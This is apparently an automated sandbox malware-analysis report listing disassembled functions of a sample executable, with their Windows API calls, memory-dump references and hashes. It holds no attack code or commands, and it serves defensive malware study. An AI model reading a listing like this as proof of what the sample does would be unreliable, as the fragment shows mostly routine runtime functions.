                                                                                                                                    • Part of subcall function 008BA6C2: LoadResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA703
                                                                                                                                    • Part of subcall function 008BA6C2: LockResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA712
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,008BB73D,00000066), ref: 008BA72D
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalLock.KERNEL32(00000000), ref: 008BA73E
                                                                                                                                    • Part of subcall function 008BA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008BA762
                                                                                                                                    • Part of subcall function 008BA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008BA7A7
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalUnlock.KERNEL32(00000000), ref: 008BA7C6
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalFree.KERNEL32(00000000), ref: 008BA7CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                  • String ID: ]
                                                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                                                  • Opcode ID: 8c8a14fbdac4ff1d0a40135d580c7be0fa9670c4203754e01bfa0afb11d2619c
                                                                                                                                  • Instruction ID: bf14e9ba4d0fec5d03d72b9eb263929c2bf2358402e5174c2ba91fe2d54e8f69
                                                                                                                                  • Opcode Fuzzy Hash: 8c8a14fbdac4ff1d0a40135d580c7be0fa9670c4203754e01bfa0afb11d2619c
                                                                                                                                  • Instruction Fuzzy Hash: 0401A1365002056BC7216BB85C49AEF7AB9FFC1752F040011B900E7391DFA1CD095262
                                                                                                                                  Function 008BD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BD64B
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008BD661
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008BD675
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 008BD684
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: RENAMEDLG
                                                                                                                                  • API String ID: 445417207-3299779563
                                                                                                                                  • Opcode ID: 665b0e3dfd130dde09b7175d13cf9674f2d8d366eb601bb87944aca7730fcde6
                                                                                                                                  • Instruction ID: 862745300665059b36fcfe33c42becd2ab8a777494899d6e010cb66269c8e0df
                                                                                                                                  • Opcode Fuzzy Hash: 665b0e3dfd130dde09b7175d13cf9674f2d8d366eb601bb87944aca7730fcde6
                                                                                                                                  • Instruction Fuzzy Hash: A801F533249324BAD2104F749D09FA7776DFB6BB01F014111F305E2292D7A29A049BB9
                                                                                                                                  Function 008C7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008C7E24,00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002), ref: 008C7E93
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008C7EA6
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,008C7E24,00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002), ref: 008C7EC9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: bf6f6473449f308d4251894ff4b92d9b967a1d69a05c9111c3d1b4f04e4e724e
                                                                                                                                  • Instruction ID: c1d5dd19575cf58f81b6de7ce7c5eea0d3346af268a1f7e4d94d999567e0acae
                                                                                                                                  • Opcode Fuzzy Hash: bf6f6473449f308d4251894ff4b92d9b967a1d69a05c9111c3d1b4f04e4e724e
                                                                                                                                  • Instruction Fuzzy Hash: 4AF06231A01208BBCB11AFA4DC09B9EBFB5FF44712F0042AAF805E2261DB349E40CA95
                                                                                                                                  Function 008AF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008AF2E4
                                                                                                                                  • GetProcAddress.KERNEL32(008E81C8,CryptUnprotectMemory), ref: 008AF2F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                  • API String ID: 2141747552-1753850145
                                                                                                                                  • Opcode ID: 2d5d5239d72df2e797478e33d9442b0a72397e8ef56ab70dcd4a5d47f850c8d0
                                                                                                                                  • Instruction ID: 12151e2ffd13201d768fb2fe67543bdc35fc77f2bafb8d866664c8c876a05d25
                                                                                                                                  • Opcode Fuzzy Hash: 2d5d5239d72df2e797478e33d9442b0a72397e8ef56ab70dcd4a5d47f850c8d0
                                                                                                                                  • Instruction Fuzzy Hash: 4EE04F74A11B229EDB209B799849B427BD4FF05700F14C92EE1EAD3751D6B8D5408B62
                                                                                                                                  Function 008C2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustPointer$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2252061734-0
                                                                                                                                  • Opcode ID: 6caaaa2e9fce07df764b86da2aaf0afe6f041e72c1969be0f83242ccd90e8792
                                                                                                                                  • Instruction ID: 88d38fd3a6806ee3b000c49ee501d2cc63459497841521b8fa58f3e6c5a8e7ee
                                                                                                                                  • Opcode Fuzzy Hash: 6caaaa2e9fce07df764b86da2aaf0afe6f041e72c1969be0f83242ccd90e8792
                                                                                                                                  • Instruction Fuzzy Hash: 9551BF7260021AAFDB298F18D845FAA77B5FF64720F24452DE902C76E1E731ED80DB91
                                                                                                                                  Function 008CBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 008CBF39
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008CBF5C
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008CBF82
                                                                                                                                  • _free.LIBCMT ref: 008CBF95
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008CBFA4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  • Opcode ID: 3d3c3be99d719fc7de9b9ca3e65c667d6787f41f8fb196ba590a55e2a6681cc5
                                                                                                                                  • Instruction ID: 8efc42a05e1623147393c33389f8ed1a04b59dbabe2b4142b059b9f7697051ac
                                                                                                                                  • Opcode Fuzzy Hash: 3d3c3be99d719fc7de9b9ca3e65c667d6787f41f8fb196ba590a55e2a6681cc5
                                                                                                                                  • Instruction Fuzzy Hash: DE017172A16A167F2721167A6C4AE7B7B7DFEC2BA1715022DF904C2241EF70CD0195B1
                                                                                                                                  Function 008C9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,008C91AD,008CB188,?,008C9813,00000001,00000364,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C986E
                                                                                                                                  • _free.LIBCMT ref: 008C98A3
                                                                                                                                  • _free.LIBCMT ref: 008C98CA
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C98D7
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C98E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  • Opcode ID: ff6a4f0a68d560d9911a010511c343a8cf6bbf3a1cb789fb7ef7794fac97344d
                                                                                                                                  • Instruction ID: da2b29facbd84cc0f88b63bec238bde7c8824f734da98583993085dea0a2d5ce
                                                                                                                                  • Opcode Fuzzy Hash: ff6a4f0a68d560d9911a010511c343a8cf6bbf3a1cb789fb7ef7794fac97344d
                                                                                                                                  • Instruction Fuzzy Hash: 8101F436145A0A6BC212736CAC8DF1B273DFBD2774721027EF955D3192EE30CC015266
                                                                                                                                  Function 008B0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B11CF: ResetEvent.KERNEL32(?), ref: 008B11E1
                                                                                                                                    • Part of subcall function 008B11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008B11F5
                                                                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 008B0F21
                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 008B0F3B
                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 008B0F54
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008B0F60
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008B0F6C
                                                                                                                                    • Part of subcall function 008B0FE4: WaitForSingleObject.KERNEL32(?,000000FF,008B1206,?), ref: 008B0FEA
                                                                                                                                    • Part of subcall function 008B0FE4: GetLastError.KERNEL32(?), ref: 008B0FF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1868215902-0
                                                                                                                                  • Opcode ID: 5c6c8182401eb6761ec32ee86c205ee492794389e1d5795e187a144e7d01e9cd
                                                                                                                                  • Instruction ID: ce62fac16b74948a7e591d41019dbdffde502cedc988c0565f350406b71e490d
                                                                                                                                  • Opcode Fuzzy Hash: 5c6c8182401eb6761ec32ee86c205ee492794389e1d5795e187a144e7d01e9cd
                                                                                                                                  • Instruction Fuzzy Hash: 40017571501B44EFC7229B64DC84BC6FBA9FB08710F000A2AF16BD22A0CB757A45CB55
                                                                                                                                  Function 008CC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008CC817
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CC829
                                                                                                                                  • _free.LIBCMT ref: 008CC83B
                                                                                                                                  • _free.LIBCMT ref: 008CC84D
                                                                                                                                  • _free.LIBCMT ref: 008CC85F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 20c6fc0169b33c9601ccf7640cad2e40cc80ae797637ee3b78648f91d9ec9652
                                                                                                                                  • Instruction ID: 7ad0acbb6e625e774ca5659d49b4b0f159d0e142c37f798f66cd18f4e9be1f18
                                                                                                                                  • Opcode Fuzzy Hash: 20c6fc0169b33c9601ccf7640cad2e40cc80ae797637ee3b78648f91d9ec9652
                                                                                                                                  • Instruction Fuzzy Hash: 8BF0F932545200EBC620EB6DF886E1B73F9FA00754765192EF249DB592CB70FC808B65
                                                                                                                                  Function 008B1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008B1FE5
                                                                                                                                  • _wcslen.LIBCMT ref: 008B1FF6
                                                                                                                                  • _wcslen.LIBCMT ref: 008B2006
                                                                                                                                  • _wcslen.LIBCMT ref: 008B2014
                                                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,008AB371,?,?,00000000,?,?,?), ref: 008B202F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CompareString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397213944-0
                                                                                                                                  • Opcode ID: 07af273297a406de9c2d9e341d930d1d7c0465d50d380795a4071ede560cb762
                                                                                                                                  • Instruction ID: 6271f89766ed120c5e914f86a6a7a7b5d230e7d1b89188c825109d8ebb543b86
                                                                                                                                  • Opcode Fuzzy Hash: 07af273297a406de9c2d9e341d930d1d7c0465d50d380795a4071ede560cb762
                                                                                                                                  • Instruction Fuzzy Hash: 2BF01D32008018BBCF226F55EC09ECA7F26FB44770B11C419F61A9B462CB72D662D791
                                                                                                                                  Function 008C8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C891E
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008C8930
                                                                                                                                  • _free.LIBCMT ref: 008C8943
                                                                                                                                  • _free.LIBCMT ref: 008C8954
                                                                                                                                  • _free.LIBCMT ref: 008C8965
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: f9c57b54ff67c18fcc2af1409c49818cab48ac2e47b06f35e29e2438dbaf8cce
                                                                                                                                  • Instruction ID: 250f70ea3aef53da50dc3eb0c2ddd93f583a629cfeeadad2957ad7dbb8267de4
                                                                                                                                  • Opcode Fuzzy Hash: f9c57b54ff67c18fcc2af1409c49818cab48ac2e47b06f35e29e2438dbaf8cce
                                                                                                                                  • Instruction Fuzzy Hash: 97F0DA7686A222DFC64A7F5CFC069157FB1F724754302061BF625D72B1CF328945AB82
                                                                                                                                  Function 008B15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _swprintf
                                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                                  • API String ID: 589789837-2259941744
                                                                                                                                  • Opcode ID: 8a7ba43e76a760cb502d48feb054de4de5dd35456330d32dd16253f47475793b
                                                                                                                                  • Instruction ID: f73c5d662414c280198e720f9d256d906df664c709d148d7e0178cc1215c5474
                                                                                                                                  • Opcode Fuzzy Hash: 8a7ba43e76a760cb502d48feb054de4de5dd35456330d32dd16253f47475793b
                                                                                                                                  • Instruction Fuzzy Hash: E2510931244308F6FE1116948C6EFE67755FB27B08FA44916F396ED6E1C9A2A410A70F
                                                                                                                                  Function 008C7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\544WP3NHaP.exe,00000104), ref: 008C7FAE
                                                                                                                                  • _free.LIBCMT ref: 008C8079
